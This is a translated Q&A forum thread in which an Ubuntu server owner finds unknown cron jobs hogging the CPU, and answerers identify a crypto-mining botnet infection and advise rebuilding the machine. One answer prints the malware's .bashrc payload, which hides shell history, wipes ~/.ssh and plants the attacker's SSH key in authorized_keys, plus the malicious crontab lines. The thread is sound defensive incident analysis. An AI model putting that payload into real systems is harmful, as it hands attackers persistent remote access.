Strange Cron Job ocupa 100% da CPU Ubuntu 18 LTS Server

21

Eu continuo recebendo trabalhos cron do Weir aparecendo e não tenho idéia do que eles fazem. Normalmente, emito kill -9 para detê-los. Eles ocupam 100% da minha CPU e podem funcionar por dias até que eu verifique. Alguém sabe o que isso significa?

sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1

Estou executando o servidor Ubuntu 18 LTS totalmente atualizado a partir de 24/07/2019

ATUALIZAR

Agradeço todos os comentários. Desconectei todas as unidades de dados e aplicativos, pois a única coisa afetada foi a unidade do SO, pelo menos fiz esse tipo de coisa corretamente. Estou indo com uma reconstrução completa, com muito mais segurança e métodos mais seguros.

server cron rsync MCP_infiltrator
fonte
8
.firefoxcatcheprovavelmente não tem nada a ver com o firefox - poderia ser apenas um minerador de bitcoin? Tente fazer o upload dos executáveis ​​para o virustotal.
Thom Wiggers
1
Os arquivos executados por esse crontab são /root/.firefoxcatche/a/upde/root/.firefoxcatche/b/sync
Thom Wiggers 25/07
2
"Não consigo encontrar o crontab para fazer o hash", o que isso significa? por que sudo crontab -eeditar não funcionaria? Mas se este é um cryptominer que você não instalou ... esses serão adicionados novamente. Primeira olhada em "/root/.firefoxcatche/a/upd" o que ele faz.
Rinzwind 25/07
2
“Preciso fazer login como root para chegar lá?” Esta é uma pergunta que não espero ver de um administrador. Você realmente precisa saber o que está fazendo a partir de agora. Altere a senha do administrador o mais rápido possível. Inspecione os arquivos listados no cron. Erradique-os.
Rinzwind 25/07
1
mas é simples assim ;-) Eu mantenho mais de 10 instâncias da nuvem do Google. Com um plano de contingência para qualquer coisa que eu pudesse imaginar dando errado. Se algo assim acontecer, eu destruiria a instância raiz, criaria uma nova, digitalizaria o disco de dados contra um clone, digitalizaria as diferenças e depois o anexaria à instância. e implementar algo para prender essa pessoa para impedir que isso aconteça novamente. No meu caso, meu salário depende disso ;-)
Rinzwind 25/07

Respostas:

40

Sua máquina provavelmente tem uma infecção por minerador de criptografia. Você pode ver alguém relatando nomes de arquivos e comportamentos semelhantes na detecção na vida real de uma máquina virtual no Azure com a Central de Segurança . Veja também Meu servidor Ubuntu possui um vírus ... Eu o localizei, mas não consigo me livrar dele ... no Reddit.

Você não pode mais confiar nessa máquina e deve reinstalá-la. Cuidado ao restaurar backups.

Thom Wiggers
fonte
8
Concordo. a senha root foi comprometida, então reinstale e tenha muito cuidado com o backup; também poderia estar lá.
Rinzwind 25/07
9

Sua máquina foi infectada com um ataque de minerador de criptografia. Também enfrentei um ataque de ransomware semelhante no passado e meu banco de dados foi comprometido. Peguei um dump SQL para a máquina e reprovisionei a máquina (como minha máquina era uma VM hospedada no AWS EC2). Também modifiquei os grupos de segurança da máquina para bloquear o acesso SSH e as senhas modificadas. Também habilitei o log para registrar consultas e exportá-lo para o S3 todas as noites.

beingadityak
fonte
4

O mesmo aconteceu comigo e eu notei ontem. Eu verifiquei o arquivo /var/log/sysloge este IP (185.234.218.40) parecia estar executando automaticamente cronjobs.

Eu verifiquei em http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ) e ele tem alguns relatórios. Estes arquivos foram editados pelo cavalo de Troia:

  • .bashrc
  • .ssh / allowed_keys

Eu encontrei isso no final de .bashrc(que é executado cada vez que o bash é aberto):

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

Ele está excluindo seu authorized_keysarquivo, que é uma lista de chaves SSH que têm permissão para se conectar sem uma senha. Em seguida, adiciona a chave SSH do atacante:

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

Além disso, encontrei esta pasta: /tmp/.X13-unix/.rsynconde estão todos os malwares. Eu até encontrei um arquivo, /tmp/.X13-unix/.rsync/c/ipum arquivo contendo 70.000 endereços IP, que provavelmente são outras vítimas ou servidores de nós.

Existem 2 soluções: A:

  • Adicione um firewall bloqueando todas as conexões de saída, exceto a porta 22 e outras que você achar necessárias e ative o fail2ban, um programa que bane um endereço IP depois que X falha na tentativa de senha

  • Mate todos os trabalhos cron : ps aux | grep cron, depois mate o PID que aparece

  • Altere sua senha para uma segura

B:

  • Faça backup de todos os arquivos ou pastas que você precisa ou deseja

  • Redefina o servidor e reinstale o Ubuntu ou crie diretamente uma nova gota

    Como Thom Wiggers disse, você certamente faz parte de uma botnet de mineração de bitcoin e seu servidor possui uma porta dos fundos . O backdoor emprega uma exploração perl, um arquivo localizado aqui /tmp/.X13-unix/.rsync/b/run:, contendo este ( https://pastebin.com/ceP2jsUy )

As pastas mais suspeitas que encontrei foram:

  • /tmp/.X13-unix/.rsync

  • ~/.bashrc (que foi editado)

  • ~/.firefoxcatche

Finalmente, existe um artigo relacionado ao Perl Backdoor aqui: https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/

Espero que você ache isso útil.

Oqhax
fonte
Limpei a unidade OS e reinstalei o Ubuntu, criei uma nova senha bastante longa e com novas chaves ssh
MCP_infiltrator 30/07
Sim, essa é uma boa solução :)
Oqhax 30/07
Essa foi uma resposta muito útil - obrigado por entender o fato que ~/.bashrcfoi editado. Eu descobri que para matar o falso que rsynceu tinha que emitir kill -9 <pid>.
Benny Hill